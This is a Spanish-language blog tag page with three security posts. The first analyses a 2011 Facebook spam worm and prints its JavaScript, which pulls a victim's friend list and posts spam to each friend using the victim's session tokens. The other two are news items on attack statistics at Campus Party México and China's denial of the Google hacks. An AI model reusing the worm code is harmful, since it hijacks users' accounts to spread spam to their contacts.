Mostrando las entradas con la etiqueta ataques. Mostrar todas las entradas
Mostrando las entradas con la etiqueta ataques. Mostrar todas las entradas

jueves, 12 de mayo de 2011

Enviar Spamm a travéz de Facebook - ==>[VERIFY MY ACCOUNT]<==



Para terminar el ciclo de post del día de hoy, analizamos el código fuente del script que fué capaz de enviar miles de post no solicitados a travez de la famosa red social Facebook.

Codigo fuente del Script Spammer ( https://docs.google.com/document/d/1A4uxqtjr-nYoL3NNwE_wklrJPn67napJEBDWk2gsYno/edit?hl=es&authkey=CLuVkYoH ).

Bueno, el ataque consta de tres etapas principales:

1. Desarrollo del script worm (no, creo que éste sea su nombre correcto) donde se obtiene por GET el listado de amigos del usuario infectado, con una simple linea. gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);

Además, se inicia un ciclo donde por medio de ajax de Facebook se envia por POST el mensaje de Spam.

var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
 var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
 "&post_form_id=" + post_form_id +
 "&fb_dtsg=" + fb_dtsg +
 "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
 "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
 "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
 "&user_message=" + message;

2. Creación e infección del primer usuario. Para lograr esto, los autores necesitaron una aplicación de Facebook o bien, utilizar el API de Facebook (Celulares) para el envío de los primeros POST con algun recortador de urls.

3. Difundir mensajes y comenzar a ganar dinero con publicidad.

Al parecer, en los primeros análisis el origen del error viene de las validaciones en aplicaciones para móviles.

Saludos!

De ultimo minuto, los monitores de Facebook han banneado las primeras URLS de los servidores donde se hospeda el fuente js, sin embargo, si no filtran los post los ataques seguirán. Este fue un ejemplo de Cross Site Scripting XSS bien hecho, saludos!

Ing Cruz. http://alfonsocruz.blogspot.com

By Unknown en jueves, mayo 12, 2011 0 comentarios
Etiquetas: , , ,

domingo, 15 de agosto de 2010

Intentan hackear Campus Party México; recibió más de 2 millones 500 mil ataques



Ciudad de México.- Durante la segunda edición del encuentro digital se registraron más de 2 millones 500 mil intentos de ataques cibernéticos hacia Campus Party México, así como dos desde la sede del evento, informó Leonardo Santiago, líder y responsable de Tecnología de Movistar para Campus.

“Dichos ataques fueron registrados por el Ovni, que es el que soporta y distribuye todas las comunicaciones que se generan dentro de Campus, tecnología que se implementa diariamente en el despliegue de la empresa”, comentó Leonardo Santiago.

Para el evento, se implementaron cinco zonas de seguridad que analizan todo el tráfico entrante y saliente de Campus Party; desde ellas se puede determinan el tipo de ataque y su lugar de procedencia para así tomar las acciones preventivas y correctivas.

Este es el “top five” de los ataques que se recibieron en Campus Party:

-Malware
-De fuerza bruta
-Spam
-A la web en http
-Spyware

Los países desde donde se recibieron más intentos de hackers fueron:

- EU
-China
-Canadá
-Brasil
-Hungría
-Rusia

Un ataque que llamó la atención de los encargados de la seguridad web de los campuseros fue uno proveniente de Bahréin – país ubicado en la región del golfo Pérsico en Asia, comparte fronteras marítimas con Arabia Saudita-; ya se investiga el tipo de evento específico.

De los dos intentos de hacking internos, uno fue para intentar acceder a los equipos que soportan toda la Campus y el otro estaba dirigido hacia una página del Gobierno de Coalcomán, Michoacán, pero “con la tecnología que usamos nos hemos podido defender, ubicar a la persona y tomar las medidas”, apuntó el vocero técnico de la empresa.

Comentó que a eso dos campuseros sólo se le pidió que desistieran de ese tipo de hakings y se les permitió seguir en el encuentro digital.

Respecto al lanzamiento de la tecnología 3.5G de Telefónica, Leonardo Santiago aseguró que está “permite una conexión a internet con ayuda de una USB de acceso móvil, con la capacidad de navegar a 2megabits en segundos, que es la velocidad promedio que tenemos en casa a través de un cable”.

Por último, señaló que el Ovni registró durante el evento un total de tráfico transmitido de 180 terabytes.

fuente milenio
By Unknown en domingo, agosto 15, 2010 0 comentarios
Etiquetas: , , , ,

viernes, 29 de enero de 2010

China niega ser responsablede ciberataques contra Google

PEKÍN.— El gobierno chino negó tajantemente estar involucrado en los ataques de hackers a Google, a través de un portavoz del Ministerio de Industria y Tecnología de la Información citado por la agencia Xinhua.

“Acusaciones abiertas o indirectas de que el gobierno chino estuvo involucrado en los ciberataques no tienen fundamento y apuntan a difamar a China”, indicó en Pekín.

La propia China es “la mayor víctima” de los ataques de hackers, ya que su propia red de “internet se ha enfrentado durante mucho tiempo a graves amenazas de hackers y ataques de virus online”, añadió.

La semana pasada la secretaria de Estado norteamericana, Hillary Clinton, amenazó con represalias en caso de confirmarse que el Estado comunista participó en ciberataques contra firmas estadunidenses. Entre tanto, Google anunció que actuaría “dentro de poco tiempo”.

La firma de internet no filtrará más los resultados de su buscador en China. No obstante, aunque la web google.cn sea dada de baja, la empresa no quiere retirarse del todo del mercado chino, dijo Eric Schmidt, presidente de la firma.

En tanto, las empresas petroleras ExxonMobil, Marathon Oil y ConocoPhillips fueron espiadas por hackers, según el diario estadunidense Christian Science Monitor, que afirmó que al menos una pista lleva a China.

De forma especialmente hábil, fueron espiados datos altamente sensibles sobre fondos petroleros mundiales, así como sobre cantidades y valores del crudo, dijeron investigadores.

Las tres sabían de los ataques informáticos desde 2008, pero no eran conscientes de la dimensión del espionaje hasta que recibieron advertencias recientes del Buró Federal de Investigaciones (FBI).

Por su parte, John Chambers, presidente de Cisco Systems, dijo que esperaba que se resuelva una disputa entre Google y el gobierno chino, diciendo que el asunto formaba parte de “un toma y daca natural”.

En tanto, Bill Gates, fundador de Microsoft, señaló que internet necesita crecer en China como motor de la libertad de expresión, y describió a la censura oficial de la red como “muy limitada”.

Gates señaló que internet es objeto de diferentes tipos de censura en todo el mundo, pero que ha demostrado ser un éxito para promover la apertura y el intercambio de ideas.

Acusación El gobierno chino asegura ser la principal víctima de estos ataques informáticos.

Fuente: exonline
By Unknown en viernes, enero 29, 2010 0 comentarios
Etiquetas: , , , ,
Suscribirse a: Entradas (Atom)

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)